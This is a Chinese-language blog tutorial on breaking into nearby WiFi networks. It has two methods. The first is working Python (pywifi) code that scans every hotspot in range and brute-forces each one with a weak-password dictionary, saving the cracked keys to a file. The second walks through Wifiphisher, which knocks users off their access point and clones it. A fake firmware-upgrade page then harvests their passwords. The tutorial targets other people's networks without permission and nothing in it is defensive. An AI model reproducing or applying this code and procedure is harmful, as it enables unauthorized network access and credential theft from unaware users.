Python+字典,实现 WiFi 破解

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

wifi字典破解

from pywifi import *
import time
import sys

如果您想要免费获取学习教程,可以加入我们的微信群或QQ群。在微信公众号的底部菜单中,您可以找到教程列表。如果您想要进行WIFI破解,使用Python和字典是必不可少的。破解热点的关键在于弱口令。您可以自己创建一个强大的字典,字典的强大程度决定了您可以破解的WIFI数量。

方法一:环境准备
首先,导入所需的模块。在这个例子中,我们只需要使用三个模块。在pywifi的wifiutillinux.py脚本中的sendcmdtowpas方法中,我们需要修改if reply != b’OK ‘的判断条件,以避免出现过多的提示信息。

12345678

123456789

88888888

1234567890

00000000

87654321

66668888

11223344

147258369

11111111
def main():
   #扫描时常
   scantimes = 3
   #单个密码测试延迟
   testtimes = 15
   output = sys.stdout
   #结果文件保存路径
   files = "TestRes.txt"
   #字典列表
   keys = open(sys.argv[1],"r").readlines()
   print "|KEYS %s"%(len(keys))
   #实例化一个pywifi对象
   wifi = PyWiFi()
   #选择定一个网卡并赋值于iface
   iface = wifi.interfaces()[0]
   #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
   scanres = scans(iface,scantimes)
   #统计附近被发现的热点数量
   nums = len(scanres)
   print "|SCAN GET %s"%(nums)
   print "%s %-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s %s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)
   #将每一个热点信息逐一进行测试
   for i,x in enumerate(scanres):
       #测试完毕后,成功的结果讲存储到files
       res = test(nums-i,iface,x,keys,output,testtimes)
       if res:
           open(files,"a").write(res)

准备字典
我们随机创建了一个包含十个常见的弱口令的WIFI字典。

配置扫描器
我们建议将扫描时间设置在15-20秒之间。测试时间可以根据需要自定义。考虑到认证速度和距离的关系,我通常将测试时间设置为15秒左右。如果时间太长,即使成功破解了热点,信号也可能不太好。

def scans(face,timeout):
   #开始扫描
   face.scan()
   time.sleep(timeout)
   #在若干秒后获取扫描结果
   return face.scan_results()
def test(i,face,x,key,stu,ts):
   #显示对应网络名称,考虑到部分中文名啧显示bssid
   showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid
   #迭代字典并进行爆破
   for n,k in enumerate(key):
       x.key = k.strip()
       #移除所有热点配置
       face.remove_all_network_profiles()
       #讲封装好的目标尝试连接
       face.connect(face.add_network_profile(x))
       #初始化状态码,考虑到用0会发生些逻辑错误
       code = 10
       t1 = time.time()
       #循环刷新状态,如果置为0则密码错误,如超时则进行下一个
       while code!=0 :
           time.sleep(0.1)
           code = face.status()
           now = time.time()-t1
           if now>ts:
               break
           stu.write(" %-*s| %-*s| %s |%*.2fs| %-*s |  %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace(" ","")))
           stu.flush()
           if code == 4:
               face.disconnect()
               return "%-*s| %s | %*s |%*s "%(20,x.ssid,x.bssid,3,x.signal,15,k)
   return False

wifi字典破解wifi字典破解

扫描周围的热点
进行热点扫描。

热点测试
在这个案例中,我们使用了11个弱口令,并扫描到了20个热点。接下来,我们将开始破解这些热点。

方法二:更快速的破解方法
目前常见的Wi-Fi加密方式有WEP、WPA2和WPS。然而,有些用户反映破解WPA2的方法耗时太长,并且不适用于所有启用了WPS的接入点。现在,我将介绍一种更省时省力的方法。

主要原理
我们将使用Wifiphisher这个优化过的自动化脚本,而不是之前的脚本(如Airsnarf)。Wifiphisher比前者更加方便。

要完成上述任务,您需要Kali Linux和两个无线适配器,其中一个必须支持数据包注入。

第一步:下载Wifiphisher
您可以下载已解压的Wifiphisher源代码,如下图所示。

wifi字典破解

当然,如果您懒得下载,也可以复制GitHub上的代码。

第二步:导航到目录
接下来,导航到解压后的Wifiphisher目录。在这个例子中,目录路径是/wifiphisherWi-Fi1.1。

当您看到目录内容时,您会看到wifiphisher.py脚本。

kali > python wifiphisher.py

wifi字典破解wifi字典破解

第三步:运行脚本
您可以输入以下脚本来运行。

请注意,如果您是第一次运行脚本,可能会提示您安装hostpad。键入Y继续安装即可。完成后,再次运行Wifiphisher脚本。这次将运行8080和43端口的Web服务器,并开始搜索附近的Wi-Fi网络。

wifi字典破解wifi字典破解wifi字典破解

等待搜索完成,您会看到一系列Wi-Fi网络名称。我们的目标是最下方的wonderhowto。

第四步:获取密码
按下Ctrl+C,然后键入要复制的AP数。在这个例子中,我们选择了12。

按下回车,Wifiphisher将显示以下结果,显示正在使用的界面以及被攻击和复制的AP的SSID。

wifi字典破解wifi字典破解

目标用户已取消验证他们的AP,随后会出现一个固件升级的信息,要求他们重新验证。一旦重新验证,他们接入的就是伪造的接入点。当用户输入密码时,它会通过Wifiphisher的开放终端传输给您。然后,他们会像往常一样上网,毫不知情,而您已经获得了密码。

赞(0)